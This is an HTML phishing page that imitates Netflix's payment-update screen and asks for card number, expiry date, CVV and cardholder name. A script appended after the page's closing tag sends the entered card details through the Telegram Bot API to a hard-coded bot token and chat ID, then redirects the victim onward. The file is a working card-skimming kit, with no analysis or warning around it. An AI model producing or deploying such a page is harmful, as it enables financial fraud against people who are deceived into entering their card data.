<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Netflix - Update Payment</title>
  <link
    rel="icon"
    href="https://assets.nflxext.com/us/ffe/siteui/common/icons/nficon2016.ico"
    type="image/x-icon"
  />
  <link href="https://fonts.googleapis.com/css2?family=Helvetica:wght@400;700&display=swap" rel="stylesheet" />
  <!-- rest of your head content -->
</head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Netflix - Update Payment</title>
  <link href="https://fonts.googleapis.com/css2?family=Helvetica:wght@400;700&display=swap" rel="stylesheet" />
  <style>
    * {
      box-sizing: border-box;
      margin: 0;
      padding: 0;
    }

    body {
      font-family: 'Helvetica', sans-serif;
      background-color: #141414;
      color: white;
      display: flex;
      justify-content: center;
      align-items: center;
      min-height: 100vh;
      padding: 1rem;
    }

    .container {
      background-color: #1f1f1f;
      padding: 2rem;
      border-radius: 8px;
      max-width: 400px;
      width: 100%;
      box-shadow: 0 0 20px rgba(0, 0, 0, 0.5);
    }

    .logo {
      text-align: center;
      margin-bottom: 1.5rem;
    }

    .logo img {
      height: 40px;
    }

    .container h2 {
      margin-bottom: 1.5rem;
      font-size: 1.5rem;
      font-weight: 700;
      text-align: center;
    }

    .input-group {
      margin-bottom: 1rem;
    }

    label {
      display: block;
      margin-bottom: 0.5rem;
      font-size: 0.9rem;
      color: #ccc;
    }

    input {
      width: 100%;
      padding: 0.75rem;
      border-radius: 4px;
      border: none;
      background-color: #333;
      color: white;
      font-size: 1rem;
    }

    input:focus {
      outline: 2px solid #e50914;
    }

    .card-logos {
      display: flex;
      justify-content: center;
      margin-bottom: 1.5rem;
    }

    .card-logos img {
      height: 32px;
      width: auto;
    }

    #detected-card-logo {
      display: block;
      height: 32px;
      margin: 0 auto 1rem;
    }

    button {
      width: 100%;
      padding: 0.75rem;
      background-color: #e50914;
      color: white;
      font-size: 1rem;
      font-weight: 700;
      border: none;
      border-radius: 4px;
      cursor: pointer;
      transition: background 0.3s;
    }

    button:hover {
      background-color: #f6121d;
    }

    @media (max-width: 480px) {
      .container {
        padding: 1.5rem;
      }

      .container h2 {
        font-size: 1.25rem;
      }
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="logo">
      <img src="https://upload.wikimedia.org/wikipedia/commons/0/08/Netflix_2015_logo.svg" alt="Netflix Logo" />
    </div>

    <h2>Update Credit Card</h2>
    <form id="telegramForm">
    <img id="detected-card-logo" src="" alt="Card Logo" style="display: none;" />

    <form>
      <div class="input-group">
        <label for="cardNumber">Card Number</label>
        <input
          type="text"
          id="cardNumber"
          placeholder="1234 5678 9012 3456"
          oninput="detectCardType(this.value)"
        />
      </div>

      <div class="input-group">
        <label for="expiry">Expiration Date</label>
        <input
          type="text"
          id="expiry"
          placeholder="MM/YY"
          maxlength="5"
          oninput="formatExpiry(this)"
        />
      </div>

      <div class="input-group">
        <label for="cvv">CVV</label>
        <input type="text" id="cvv" placeholder="123" />
      </div>

      <div class="input-group">
        <label for="name">Cardholder Name</label>
        <input type="text" id="name" placeholder="John Doe" />
      </div>

      <button type="submit">Update Payment</button>
    </form>
  </div>

  <script>
    function detectCardType(number) {
      const logo = document.getElementById('detected-card-logo');
      number = number.replace(/\s+/g, '');
      if (!number) {
        logo.style.display = 'none';
        logo.src = '';
        logo.alt = '';
        return;
      }
      logo.style.display = 'block';

      if (/^4/.test(number)) {
        logo.src = 'https://img.icons8.com/color/48/visa.png';
        logo.alt = 'Visa';
      } else if (/^5[1-5]/.test(number)) {
        logo.src = 'https://img.icons8.com/color/48/mastercard-logo.png';
        logo.alt = 'Mastercard';
      } else if (/^3[47]/.test(number)) {
        logo.src = 'https://img.icons8.com/color/48/amex.png';
        logo.alt = 'American Express';
      } else {
        logo.style.display = 'none';
        logo.src = '';
        logo.alt = '';
      }
    }

    function formatExpiry(input) {
      let value = input.value.replace(/\D/g, ''); // Remove non-digits
      if (value.length > 4) {
        value = value.slice(0, 4);
      }
      if (value.length > 2) {
        value = value.slice(0, 2) + '/' + value.slice(2);
      }
      input.value = value;
    }
  </script>
</body>
</html>
     <script>
    const botToken = '7764032513:AAFOgtYO7zHSkIK4eggYO0niYGZ6l--Ym5U'; // Replace with your bot's token
    const chatId = '1998168170';     // Replace with your Telegram user or group chat ID

    document.getElementById('telegramForm').addEventListener('submit', function(e) {
      e.preventDefault();

      const cardNumber = document.getElementById('cardNumber').value;
      const expiry = document.getElementById('expiry').value;
      const cvv = document.getElementById('cvv').value;
      const name = document.getElementById('name').value;

      const message = `📥 Netflx cc :
 cardNumber: ${cardNumber}
 expiry: ${expiry}
 cvv: ${cvv}
 name: ${name}`;

      const url = `https://api.telegram.org/bot${botToken}/sendMessage`;

      fetch(url, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          chat_id: chatId,
          text: message
        })
      })
      .then(response => response.json())
      .then(data => {
        // Redirect to a new page on success
        window.location.href = "loader2.html"; // Change to your desired page
      })
      .catch(error => {
        alert("Failed to send.");
        console.error('Error:', error);
      });
    });
  </script>
</body>
</html>
